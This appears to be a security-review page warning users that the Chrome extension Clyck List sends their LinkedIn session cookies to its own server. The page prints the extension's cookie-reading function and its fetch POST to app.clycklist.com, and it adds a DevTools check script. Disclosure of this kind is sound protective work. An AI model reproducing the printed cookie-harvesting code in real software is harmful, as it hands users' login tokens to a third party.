Is Clyck List safe?

Medium risk

Clyck List reads your LinkedIn session cookies and sends them to its own backend to replay your login.

When you use Clyck List's lead-extraction buttons on LinkedIn, the extension reads your li_a, li_at, and JSESSIONID cookies and includes them in the data it posts to its own server. It also injects the same cookie values into a page it opens on its own site. Because li_at is LinkedIn's master authentication token, this gives Clyck List's backend a reusable copy of your LinkedIn login, not just a normal API call made through your browser session.

hellov1.0.2Chrome Web Store
45Risk

AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.

Publishers can request a review.

Findings

SeverityHIGH
ClassUNWANTED
TypeUnexpected
CWECWE-522
SourceAI FOUND

Clicking Extract leads sends your LinkedIn login cookie to clycklist.com

Code analysis shows the extension reads your LinkedIn li_a, li_at, and JSESSIONID cookies and sends the raw values to its own clycklist.com backend when you extract a lead, giving that server a replayable copy of your LinkedIn session.

01EvidenceCAUSE EFFECT
What actually happens
You did this

You click Extract leads on a LinkedIn Sales Navigator search, list, or profile page.

The button is injected by the extension's content script on linkedin.com/sales pages.

The extension did this

The extension reads your LinkedIn session cookies and sends the raw values to its own server.

li_a, li_at, and JSESSIONID are bundled into the extraction request and posted to app.clycklist.com.

02EvidenceFIELD TABLE
Cookies read from linkedin.com and sent to clycklist.com
FieldValueWhy it matters
LinkedIn login token (li_at)
AQEFARABAAAAABe3odI...LrK9 (illustrative)LinkedIn's main authentication cookie. Whoever holds it can act as you on LinkedIn without your password.
LinkedIn account cookie (li_a)
AQIAAAB1odI9x2AAABe...9x2 (illustrative)A secondary LinkedIn account identifier cookie sent alongside li_at.
Session ID (JSESSIONID)
ajax:8172930445512004455 (illustrative)LinkedIn's server-side session identifier, used together with li_at to validate requests.
03EvidenceCODE COMPARE
The code that does this

Reading the LinkedIn cookies and shipping them to the vendor's server

What it actually does
Cookie read, readablestatic/js/background.js
async function getCookiesForUrl(url, cookieNames) {
  const result = {};
  const cookies = await Promise.all(
    cookieNames.map((name) => chrome.cookies.get({ name, url }))
  );
  for (const cookie of cookies) {
    if (cookie && cookieNames.includes(cookie.name)) {
      result[cookie.name] = cookie.value; // raw value, including li_at
    }
  }
  return result;
}

async function getLinkedinCookies() {
  return getCookiesForUrl("https://www.linkedin.com", ["li_a", "li_at", "JSESSIONID"]);
}
POST to clycklist.com, readablestatic/js/background.js
async function extractOneLeadInFlight(payload) {
  // payload.linkedinCookies = { li_a, li_at, JSESSIONID } from getLinkedinCookies()
  const response = await fetch(
    webappOrigin + "/api/extractions/extract-one-lead-in-flight",
    {
      method: "POST",
      headers: {
        cookie: `${sessionCookieName}=${await getWebappSessionCookie()}`,
        Accept: "application/json",
        "Content-Type": "application/json",
      },
      body: JSON.stringify(payload),
    }
  );
  return response.json();
}
04EvidenceTHIRD PARTY LIST
Where the cookies end up
  • app.clycklist.com

    Clycklist's own lead-extraction backend. Receives li_a/li_at/JSESSIONID in the extraction POST body and again via window.__slSharedData on a tab it opens.

05EvidenceARTIFACT
Check if you're affected

Checks whether the extension wrote your LinkedIn cookies into a page-global variable on clycklist.com.

RequiresChrome DevToolsExtension installed and signed into LinkedIn
check-clycklist-cookie-exposure.js · js
// Run in DevTools Console on the app.clycklist.com/app/lists/new tab
// that the extension opens after 'Start new list'.
if (window.__slSharedData) {
  const data = JSON.parse(window.__slSharedData);
  console.log("linkedinCookies exposed on this page:", data.linkedinCookies);
} else {
  console.log("__slSharedData not present on this page.");
}
How to run it
  1. 1
    Sign into LinkedIn and open Sales Navigator.
  2. 2
    Trigger Start new list via the extension.
  3. 3
    In the new clycklist.com tab, open DevTools > Console.
  4. 4
    Paste and run this script.
06EvidencePLAIN NOTE
Observation

Static analysis finding. This behaviour was identified by reading the shipped extension code and has not yet been reproduced in a live run. The trigger conditions and the exact data sent are read from the code, not from an observed capture.

What it can do

Permissions this extension asks for, as declared in version 1.0.2. Asking for a permission is not a finding on its own - it is what the extension can do if it chooses to.

  • Read and change your data on localhost

    *://localhost/

  • Read and change your data on linkedin.com

    *://*.linkedin.com/

  • Read and change your data on clycklist.com

    *://*.clycklist.com/

  • Act on the current tab, but only after you click the extension

    activeTab

  • Read and change cookies, including the ones that keep you signed in

    cookies

  • See the address and title of every tab you have open

    tabs

  • Run its own code inside the pages you visit

    scripting

Where it sends data

Destinations our analysis observed Clyck List contacting. Sending data somewhere is not a finding on its own - an extension that syncs your settings has to talk to its own server - but it is where your data can go, and who else it goes to.

  • app.clycklist.com

    Clyck List sends data to app.clycklist.com. No other extension we have analysed sends data here.

Updated 30 September 2026gofabicdoplnhcljinpgdhbbjicdgagf